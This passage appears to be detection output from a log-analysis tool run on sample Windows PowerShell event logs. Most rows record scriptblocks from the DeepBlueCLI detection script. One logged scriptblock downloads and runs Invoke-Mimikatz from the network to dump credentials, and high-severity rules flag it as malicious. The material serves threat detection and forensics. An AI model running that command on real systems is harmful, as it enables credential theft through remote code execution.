== 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:20.569 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:20.569 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:20.569 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:20.572 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:20.578 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:20.581 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:27.201 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:27.201 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:27.202 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:27.203 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:27.734 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:49.131 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:56.217 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:03.586 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:03.586 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:12.696 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:14.161 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:28.002 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 